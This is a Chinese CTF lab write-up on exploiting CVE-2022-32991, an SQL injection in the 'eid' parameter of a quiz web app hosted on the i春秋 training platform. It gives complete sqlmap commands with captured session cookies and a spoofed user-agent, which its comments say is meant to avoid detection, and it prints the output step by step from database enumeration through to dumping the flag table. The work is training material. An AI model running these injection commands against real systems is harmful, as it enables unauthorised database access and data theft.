CVE-2022-32991（2_sqlmap）

/*这个是i春秋上的靶场*/

存在sql注入的url：http://eci-2ze2knq7i99iy3qim8fw.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=7&t=10
参数eid存在sql注入漏洞
———— 开始用工具（sqlmap）测试

/*
由于该页面采用了登录访问，
所以首先想到要使用–cookie参数使得sqlmap绕过身份验证，
并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证，
否则可能会被识别到明显的sqlmap客户端标识，从而导致攻击的中断。
*/

--user-agent="aaaaaaaaa" # 使用浏览器代理头
--cookie="security=low;PHPSESSID=121123131" # 使用cookie的身份认证
--batch # 自动选是
--dbs # 查询所有数据库

目标地址为http://eci-2ze2knq7i99iy3qim8fw.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=7&t=10

1，先用burp(或f12)抓包cookie参数和-user agent参数
GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1
Host: eci-2ze0y2waqtqf20pv53dz.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=9eb9cd2b4741fa438383d75af1752a9fd94cf6cc; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1684140255,1684141300,1684149352; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1684149352; PHPSESSID=0vrjjiefr88k254fe5dp6o5lhc; td_cookie=3079228194
Connection: close

！！！不对劲，没跑出来 服啦！
我的语句：
python sqlmap.py -u "http://eci-2zeiqdtozk9he50hvar3.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" --cookie="chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=9eb9cd2b4741fa438383d75af1752a9fd94cf6cc; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1684140255,1684141300,1684149352; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1684149352; PHPSESSID=0vrjjiefr88k254fe5dp6o5lhc; td_cookie=3079228194" --batch --tables

他的语句：
python2 sqlmap.py -u "http://eci-2ze1ffkajuqep18qbhue.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" --cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma" --batch --dbs
这个是参考的其他wp的，搞半天没测出来，我人都麻了（也没错啊，咋就没跑出来），然后就直接梭哈算了，选了个已知的参数（eid），但是开始的时候直接-u梭哈sqlmap报了其他参数也存在注入点，但是现在先不管那么多了（开始手工测过的），直接指定eid参数吧，然后跑当前数据库名，设置所有选项选“是”

 

开始用工具测试/*开始跑！！！，浪费好多时间呜呜呜*/

语句(Windows)

跑当前库名
python sqlmap.py -u"http://eci-2ze1ffkajuqep18qbhue.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" -p"eid" --current-db --batch
得到信息
[22:30:46] [INFO] fetching current database
[22:30:46] [INFO] resumed: 'ctf'
current database: 'ctf'
跑当前库（ctf）下的所有表名
python sqlmap.py -u"http://eci-2ze1ffkajuqep18qbhue.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" -p"eid" --current-db -D "ctf" --tables --batch
看到了关键信息————存在flag表
Database: ctf
[9 tables]
+-----------+
| rank |
| user |
| admin |
| answer |
| flag |
| history |
| options |
| questions |
| quiz |
+-----------+

跑当前flag表下的所有字段名
python sqlmap.py -u"http://eci-2ze1ffkajuqep18qbhue.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" -p"eid" --current-db -D "ctf" -T flag --columns --batch
再次看到关键信息———存在flag字段
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type |
+--------+---------------+
| flag | varchar(1024) |
+--------+---------------+
最后跑flag值
python sqlmap.py -u"http://eci-2ze1ffkajuqep18qbhue.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1&t=10" -p"eid" --current-db -D "ctf" -T flag --dump --batch
得到结果
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag |
+--------------------------------------------+
| flag{c77065a4-e4c8-46c9-9157-6c81347d6205} |
+--------------------------------------------+
拿到flag：
flag{c77065a4-e4c8-46c9-9157-6c81347d6205}

 

终于完成啦，耗费了好多时间，，，，还没想明白，算了以后再来看吧